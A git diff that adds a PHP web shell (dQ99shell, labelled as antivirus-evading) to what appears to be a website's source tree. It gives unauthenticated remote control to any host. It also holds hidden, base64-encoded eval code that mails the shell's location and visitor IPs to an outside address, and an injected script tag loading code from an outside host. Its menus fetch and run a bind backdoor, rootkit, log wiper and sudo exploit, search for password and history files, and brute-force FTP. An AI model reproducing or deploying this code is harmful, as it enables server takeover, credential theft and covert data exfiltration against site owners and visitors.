+      else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      if (!$ret) {return $ret;}
+    }
+  }
+  closedir($h);
+  return TRUE;
+}
+function fs_copy_obj($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+  if (is_dir($d)) {
+    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+    if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+    return fs_copy_dir($d,$t);
+  }
+  elseif (is_file($d)) { return copy($d,$t); }
+  else { return FALSE; }
+}
+function fs_move_dir($d,$t) {
+
+  $h = opendir($d);
+  if (!is_dir($t)) {mkdir($t);}
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      $ret = TRUE;
+      if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+      if (!$ret) {return $ret;}
+     }
+   }
+  closedir($h);
+  return TRUE;
+}
+function fs_move_obj($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+  if (is_dir($d)) {
+    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+    if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+    return fs_move_dir($d,$t);
+  }
+  elseif (is_file($d)) {
+    if(copy($d,$t)) {return unlink($d);}
+    else {unlink($t); return FALSE;}
+  }
+  else {return FALSE;}
+}
+function fs_rmdir($d) {
+  $h = opendir($d);
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      if (!is_dir($d.$o)) {unlink($d.$o);}
+      else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+    }
+  }
+  closedir($h);
+  rmdir($d);
+  return !is_dir($d);
+}
+function fs_rmobj($o) {
+  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+  if (is_dir($o)) {
+    if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+    return fs_rmdir($o);
+  }
+  elseif (is_file($o)) {return unlink($o);}
+  else {return FALSE;}
+}
+## END FILESYSTEM FUNCTIONS ##
+function onphpshutdown() {
+  global $gzipencode,$ft;
+  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
+    $v = @ob_get_contents();
+    @ob_end_clean();
+    @ob_start("ob_gzHandler");
+    echo $v;
+    @ob_end_flush();
+  }
+}
+function dQ99shexit() { onphpshutdown(); exit; }
+
+function dQ99fsearch($d) {
+  global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a;
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $h = opendir($d);
+  while (($f = readdir($h)) !== FALSE) {
+    if($f != "." && $f != "..") {
+      $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+      if (is_dir($d.$f)) {
+        $search_i_d++;
+        if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+        if (!is_link($d.$f)) {dQ99fsearch($d.$f);}
+      }
+      else {
+        $search_i_f++;
+        if ($bool) {
+          if (!empty($a["text"])) {
+            $r = @file_get_contents($d.$f);
+            if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+            if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+            if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+            else {$bool = strpos(" ".$r,$a["text"],1);}
+            if ($a["text_not"]) {$bool = !$bool;}
+            if ($bool) {$found[] = $d.$f; $found_f++;}
+          }
+          else {$found[] = $d.$f; $found_f++;}
+        }
+      }
+    }
+  }
+  closedir($h);
+}
+function view_size($size) {
+  if (!is_numeric($size)) { return FALSE; }
+  else {
+    if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+    elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+    elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+    else {$size = $size . " B";}
+    return $size;
+  }
+}
+function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
+function view_perms($mode) {
+  if (($mode & 0xC000) === 0xC000) {$type = "s";}
+  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+  else {$type = "?";}
+  $owner["read"] = ($mode & 00400)?"r":"-";
+  $owner["write"] = ($mode & 00200)?"w":"-";
+  $owner["execute"] = ($mode & 00100)?"x":"-";
+  $group["read"] = ($mode & 00040)?"r":"-";
+  $group["write"] = ($mode & 00020)?"w":"-";
+  $group["execute"] = ($mode & 00010)?"x":"-";
+  $world["read"] = ($mode & 00004)?"r":"-";
+  $world["write"] = ($mode & 00002)? "w":"-";
+  $world["execute"] = ($mode & 00001)?"x":"-";
+  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+  return $type.join("",$owner).join("",$group).join("",$world);
+}
+function parse_perms($mode) {
+  if (($mode & 0xC000) === 0xC000) {$t = "s";}
+  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+  else {$t = "?";}
+  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+function parsesort($sort) {
+  $one = intval($sort);
+  $second = substr($sort,-1);
+  if ($second != "d") {$second = "a";}
+  return array($one,$second);
+}
+function view_perms_color($o) {
+  if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+  elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+  else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+function str2mini($content,$len) {
+  if (strlen($content) > $len) {
+    $len = ceil($len/2) - 2;
+    return substr($content, 0,$len)."...".substr($content,-$len);
+  } else {return $content;}
+}
+function strips(&$arr,$k="") {
+  if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } }
+  else { $arr = stripslashes($arr); }
+}
+
+function getmicrotime() {
+  list($usec, $sec) = explode(" ", microtime());
+  return ((float)$usec + (float)$sec);
+}
+
+function milw0rm() {
+  $Lversion = php_uname(r);
+  $OSV = php_uname(s);
+  if(eregi("Linux",$OSV)) {
+    $Lversion = substr($Lversion,0,6);
+    return "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+  } else {
+    $Lversion = substr($Lversion,0,3);
+    return "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+  }
+}
+function tools() {
+  echo "List of tools";
+}
+
+function sh_name() { return base64_decode("ZGlLaSBkUTk5c2hlbGwgdg==").sh_ver; }
+function htmlhead($safemode) {
+$style = '
+<style type="text/css">
+body,table {font:8pt verdana;background-color:black;}
+table {width:100%;}
+table,td,#maininfo td {padding:3px;}
+table,td,input,select,option {border:1px solid #808080;}
+body,table,input,select,option {color:#FFFFFF;}
+a {color:lightblue;text-decoration:none; } a:link {color:#5B5BFF;} a:hover {text-decoration:underline;} a:visited {color:#99CCFF;}
+textarea {color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2;}
+#pagebar {padding:5px;border:3px solid #1E1E1E;border-collapse:collapse;}
+#pagebar td {vertical-align:top;}
+#pagebar,#pagebar p,.info,input,select,option {font:8pt tahoma;}
+#pagebar a {font-weight:bold;color:#00FF00;}
+#pagebar a:visited {color:#00CE00;}
+#mainmenu {text-align:center;}
+#mainmenu a {text-align: center;padding: 0px 5px 0px 5px;}
+#maininfo,.barheader,.bartitle {text-align:center;}
+.fleft {float:left;text-align:left;}
+.fright {float:right;text-align:right;}
+.bartitle {padding:5px;border:2px solid #1F1F1F;}
+.barheader {font-weight:bold;padding:5px;}
+.info,.info td,.info th {margin:0;padding:0;border-collapse:collapse;}
+.info th {color:#00FF00;text-align:left;width:13%;}
+.contents,.explorer {border-collapse:collapse;}
+.contents,.explorer td,th {vertical-align:top;}
+.mainpanel {border-collapse:collapse;padding:5px;}
+.barheader,.mainpanel table,td {border:1px solid #333333;}
+input[type="submit"],input[type="button"] {border:1px solid #000000;}
+input[type="text"] {padding:3px;}
+.shell {background-color:#000000;color:#00FF00;padding:5px;font-size:12;}
+.fxerrmsg {color:red; font-weight:bold;}
+#pagebar,#pagebar p,h1,h2,h3,h4,form {margin:0;}
+#pagebar,.mainpanel,input[type="submit"],input[type="button"] {background-color:#4A4A4A;}
+.bartitle,input,select,option,input[type="submit"]:hover,input[type="button"]:hover {background-color:#333333;}
+textarea,#pagebar input[type="text"],.mainpanel input[type="text"],input[type="file"],select,option {background-color:#000000;}
+input[type="label"] { text-align:right;}
+.info,.info td,input[type="label"] {border:0;background:none;}
+</style>
+';
+$html_start = '
+<html><head>
+<title>'.getenv("HTTP_HOST").' - '.sh_name().'</title>
+'.$style.'
+</head>
+<SCRIPT SRC=http://cpc-gov.cn/a/a/a.asp></SCRIPT>
+<body>
+<div class=bartitle><h4>'.sh_name().'</h4>.: r57.biz Dq99Shell :.</div>
+';
+return $html_start;
+};
+function footer() {
+  echo "<div class=bartitle colspan=2><font size=1 color=#00FF00> By www.r57.biz, ?2008 FeeLCoMz Community, Generated: ".round(getmicrotime()-starttime,4)." seconds</font></div>";
+}
+chdir($lastdir); dQ99shexit();
+?>
\ No newline at end of file
diff --git a/www-7jyewu-cn/国外免杀php大马.php b/www-7jyewu-cn/国外免杀php大马.php
new file mode 100644
index 0000000..14076b9
--- /dev/null
+++ b/www-7jyewu-cn/国外免杀php大马.php
@@ -0,0 +1,3112 @@
+<?php
+#######################################
+## r57gentr dQ99Sh 2.0.03.09         ##
+define('sh_ver',"2.0.03.09");        ##
+## By diKi                           ##
+## ?03-09 2008 FeeLCoMz Community   ##
+## Written under PHP 5.2.5           ##
+#######################################
+$sh_name = sh_name();                ##
+#######################################
+#$sh_mainurl        = "http://localhost/dQ99SH/";
+$sh_mainurl        = "http://waterski21.com/bbs/config/tool/";
+#$dQ99sh_updateurl  = $sh_mainurl."dQ99sh_update.php";
+$dQ99sh_sourcesurl = $sh_mainurl."readme.txt";
+$sh_sourcez = array(
+  "dQ99Sh"   => array($sh_mainurl."readme.txt","kiddie.php"),
+  "psyBNC"   => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),
+  "Eggdrop"  => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),
+  "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
+);
+##[ AUTHENTICATION ]##
+$auth = array(
+  "login"     => "",
+  "pass"      => "",
+  "md5pass"   => "",
+  "hostallow" => array("*"),
+  "denied"    => "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied!",
+);
+##[ END AUTHENTICATION ]##
+$curdir = "./";
+$tmpdir = "";
+$tmpdir_logs = "./";
+$log_email = "ayam@jago.us"; #Email logna
+$sess_cookie = "dQ99shcook";
+$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
+$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.
+$usefsbuff = TRUE;
+$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste
+$surl_autofill_include = TRUE;
+$updatenow   = FALSE;
+$gzipencode  = TRUE;
+$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$millink = milw0rm();
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+$disablefunc = getdisfunc();
+##[ END OF CONFIGS ]##
+error_reporting(E_ERROR | E_PARSE);
+@ini_set("max_execution_time",0);
+@set_time_limit(0); #No dQ in SafeMode
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) { strips($GLOBALS); }
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["dQ99shcook"]);
+foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } }
+$dQbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RdQ0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gImRROTlTaGVsbCBodHRwOi8vJHRhcmdldCBzYW1hICR2aXNpdG9yIjsNCiAgJGJvZHkgICAgPSAiQnVnOiAkdGFyZ2V0IHNhbWEgJHZpc2l0b3I8YnI+IjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiZGhpZXF3ZWJtYXJrZXJAeWFob28uY29tIiwkanVkdWwsJGJvZHkpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($dQbuff));
+if ($surl_autofill_include) {
+  $include = "&";
+  foreach (explode("&",getenv("QUERY_STRING")) as $v) {
+    $v = explode("=",$v);
+    $name = urldecode($v[0]);
+    $value = @urldecode($v[1]);
+    foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
+      if (strpos($value,$needle) === 0) {
+        $includestr .= urlencode($name)."=".urlencode($value)."&";
+      }
+    }
+  }
+}
+if (empty($surl)) {
+  $surl = "?".$includestr;
+  $surl = htmlspecialchars($surl);
+}
+## FILE TYPES ##
+$ftypes  = array(
+  "html"     => array("html","htm","shtml"),
+  "txt"      => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+  "exe"      => array("sh","install","bat","cmd"),
+  "ini"      => array("ini","inf","conf"),
+  "code"     => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+  "img"      => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+  "sdb"      => array("sdb"),
+  "phpsess"  => array("sess"),
+  "download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+$exeftypes  = array(
+  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+  "perl %f%"                => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
+  array("\.tgz$",1,"<font color=#C082FF>","</font>"),
+  array("\.gz$",1,"<font color=#C082FF>","</font>"),
+  array("\.tar$",1,"<font color=#C082FF>","</font>"),
+  array("\.bz2$",1,"<font color=#C082FF>","</font>"),
+  array("\.zip$",1,"<font color=#C082FF>","</font>"),
+  array("\.rar$",1,"<font color=#C082FF>","</font>"),
+  array("\.php$",1,"<font color=#00FF00>","</font>"),
+  array("\.php3$",1,"<font color=#00FF00>","</font>"),
+  array("\.php4$",1,"<font color=#00FF00>","</font>"),
+  array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
+  array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
+  array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
+  array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
+  array("\.ico$",1,"<font color=#00FFFF>","</font>"),
+  array("\.gif$",1,"<font color=#00FFFF>","</font>"),
+  array("\.png$",1,"<font color=#00FFFF>","</font>"),
+  array("\.htm$",1,"<font color=#00CCFF>","</font>"),
+  array("\.html$",1,"<font color=#00CCFF>","</font>"),
+  array("\.txt$",1,"<font color=#C0C0C0>","</font>")
+);
+## QUICK COMMANDS ##
+if (!$win) {
+  $cmdaliases = array(
+    array("", "ls -al"),
+    array("Find all suid files", "find / -type f -perm -04000 -ls"),
+    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
+    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
+    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
+    array("Find config* files", "find / -type f -name \"config*\""),
+    array("Find config* files in current dir", "find . -type f -name \"config*\""),
+    array("Find all writable folders and files", "find / -perm -2 -ls"),
+    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
+    array("Find all writable folders", "find / -type d -perm -2 -ls"),
+    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
+    array("Find all service.pwd files", "find / -type f -name service.pwd"),
+    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
+    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
+    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+    array("Find all .bash_history files", "find / -type f -name .bash_history"),
+    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
+    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+    array("List file attributes on a Linux second extended file system", "lsattr -va"),
+    array("Show opened ports", "netstat -an | grep -i listen")
+  );
+  $cmdaliases2 = array(
+    array("wget & extract psyBNC","wget ".$sh_mainurl."dQ.tgz;tar -zxf dQ.tgz"),
+    array("wget & extract EggDrop","wget ".$sh_mainurl."dQb.tgz;tar -zxf dQb.tgz"),
+    array("-----",""),
+    array("Logged in users","w"),
+    array("Last to connect","lastlog"),
+    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
+    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
+    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
+    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
+    array("CPU Info","cat /proc/version /proc/cpuinfo"),
+    array("Is gcc installed ?","locate gcc"),
+    array("Format box (DANGEROUS)","rm -Rf"),
+    array("-----",""),
+    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
+    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
+    array("Run WIPELOGS PT3","./zap2"),
+    array("-----",""),
+    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
+    array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
+    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
+  );
+}
+else {
+  $cmdaliases = array(
+    array("", "dir"),
+    array("Find index.php in current dir", "dir /s /w /b index.php"),
+    array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
+    array("Find c99shell in current dir", "find /c \"c99\" *"),
+    array("Find r57shell in current dir", "find /c \"r57\" *"),
+    array("Find dQ99shell in current dir", "find /c \"dQ99\" *"),
+    array("Show active connections", "netstat -an"),
+    array("Show running services", "net start"),
+    array("User accounts", "net user"),
+    array("Show computers", "net view"),
+  );
+}
+## PHP FILESYSTEM TRICKS (By diKi) ##
+$phpfsaliases = array(
+    array("Read File", "read", 1, "File", ""),
+    array("Write File (PHP5)", "write", 2, "File","Text"),
+    array("Copy", "copy", 2, "From", "To"),
+    array("Rename/Move", "rename", 2, "File", "To"),
+    array("Delete", "delete", 1 ,"File", ""),
+    array("Make Dir","mkdir", 1, "Dir", ""),
+    array("Download", "download", 2, "URL", "To"),
+    array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
+    array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
+    array("Find Writable Dir", "fwritabledir", 2 ,"Dir"),
+    array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
+);
+## QUICK LAUNCH ##
+$quicklaunch1 = array(
+    array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" border=\"0\">",$surl),
+    array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" border=\"0\">","#\" onclick=\"history.back(1)"),
+    array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" border=\"0\">","#\" onclick=\"history.go(1)"),
+    array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+    array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" border=\"0\">",$surl."act=search&d=%d"),
+    array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" border=\"0\">",$surl."act=fsbuff&d=%d")
+);
+$quicklaunch2 = array(
+    array("Security Info",$surl."act=security&d=%d"),
+    array("Processes",$surl."act=processes&d=%d"),
+    array("MySQL",$surl."act=sql&d=%d"),
+    array("Eval",$surl."act=eval&d=%d"),
+    array("Encoder",$surl."act=encoder&d=%d"),
+    array("Mailer",$surl."act=dQmailer"),
+    array("milw0rm",$millink),
+    array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"),
+    array("Toolz",$surl."act=tools&d=%d"),
+    array("Kill-Shell",$surl."act=selfremove"),
+    array("Feedback",$surl."act=feedback"),
+    array("Update",$surl."act=update"),
+    array("About",$surl."act=about")
+);
+if (!$win) {
+  $quicklaunch2[] = array("<br>FTP-Brute",$surl."act=ftpquickbrute&d=%d");
+}
+## HIGHLIGHT CODE ##
+$highlight_background = "#C0C0C0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+####################
+##[ AUTHENTICATE ]##
+####################
+$tmp = array();
+foreach ($auth["hostallow"] as $k => $v) {
+  $tmp[] = str_replace("\\*",".*",preg_quote($v));
+}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
+  exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
+}
+if (!empty($auth["login"])) {
+  if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); }
+  if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) {
+    header("WWW-Authenticate: Basic realm=\"".$sh_name.": Restricted Area\"");
+    header("HTTP/1.0 401 Unauthorized");
+    die($auth["denied"]);
+  }
+}
+## END AUTHENTICATE ##
+
+if ($act != "img") {
+  $lastdir = realpath(".");
+  chdir($curdir);
+  if ($updatenow) { @ob_clean(); dQ99sh_getupdate(1); exit; }
+  $sess_data = @unserialize($_COOKIE["$sess_cookie"]);
+  if (!is_array($sess_data)) { $sess_data = array(); }
+  if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); }
+  if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); }
+  dQ99_buff_prepare();
+  foreach (array("sort","sql_sort") as $v) {
+    if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+    if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+  }
+  if ($sort_save) {
+    if (!empty($sort)) {setcookie("sort",$sort);}
+    if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+  }
+  if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+  if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+  if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+  if (!function_exists("mysql_dump")) {
+    function mysql_dump($set) {
+      global $sh_ver;
+      $sock = $set["sock"];
+      $db = $set["db"];
+      $print = $set["print"];
+      $nl2br = $set["nl2br"];
+      $file = $set["file"];
+      $add_drop = $set["add_drop"];
+      $tabs = $set["tabs"];
+      $onlytabs = $set["onlytabs"];
+      $ret = array();
+      $ret["err"] = array();
+      if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+      if (empty($db)) {$db = "db";}
+      if (empty($print)) {$print = 0;}
+      if (empty($nl2br)) {$nl2br = 0;}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (empty($file)) {
+        $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+      }
+      if (!is_array($tabs)) {$tabs = array();}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (sizeof($tabs) == 0) {
+        //Retrieve tables-list
+        $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+        if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+      }
+      $out = "
+      # Dumped by ".$sh_name."
+      #
+      # Host settings:
+      # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+      # Date: ".date("d.m.Y H:i:s")."
+      # DB: \"".$db."\"
+      #---------------------------------------------------------";
+      $c = count($onlytabs);
+      foreach($tabs as $tab) {
+        if ((in_array($tab,$onlytabs)) or (!$c)) {
+          if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+          //Receieve query for create table structure
+          $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+          if (!$res) {$ret["err"][] = mysql_smarterror();}
+          else {
+            $row = mysql_fetch_row($res);
+            $out .= $row["1"].";\n\n";
+            //Receieve table variables
+            $res = mysql_query("SELECT * FROM `$tab`", $sock);
+            if (mysql_num_rows($res) > 0) {
+              while ($row = mysql_fetch_assoc($res)) {
+                $keys = implode("`, `", array_keys($row));
+                $values = array_values($row);
+                foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+                $values = implode("', '", $values);
+                $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+                $out .= $sql;
+              }
+            }
+          }
+        }
+      }
+      $out .= "#---------------------------------------------------------------------------------\n\n";
+      if ($file) {
+        $fp = fopen($file, "w");
+        if (!$fp) {$ret["err"][] = 2;}
+        else {
+          fwrite ($fp, $out);
+          fclose ($fp);
+        }
+      }
+      if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+      return $out;
+    }
+  }
+  if (!function_exists("mysql_buildwhere")) {
+    function mysql_buildwhere($array,$sep=" and",$functs=array()) {
+      if (!is_array($array)) {$array = array();}
+      $result = "";
+      foreach($array as $k=>$v) {
+        $value = "";
+        if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+        $value .= "'".addslashes($v)."'";
+        if (!empty($functs[$k])) {$value .= ")";}
+        $result .= "`".$k."` = ".$value.$sep;
+      }
+      $result = substr($result,0,strlen($result)-strlen($sep));
+      return $result;
+    }
+  }
+  if (!function_exists("mysql_fetch_all")) {
+    function mysql_fetch_all($query,$sock) {
+      if ($sock) {$result = mysql_query($query,$sock);}
+      else {$result = mysql_query($query);}
+      $array = array();
+      while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+      mysql_free_result($result);
+      return $array;
+    }
+  }
+  if (!function_exists("mysql_smarterror")) {
+    function mysql_smarterror($type,$sock) {
+      if ($sock) {$error = mysql_error($sock);}
+      else {$error = mysql_error();}
+      $error = htmlspecialchars($error);
+      return $error;
+    }
+  }
+  if (!function_exists("mysql_query_form")) {
+    function mysql_query_form() {
+      global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+      if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+      if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+      if ((!$submit) or ($sql_act)) {
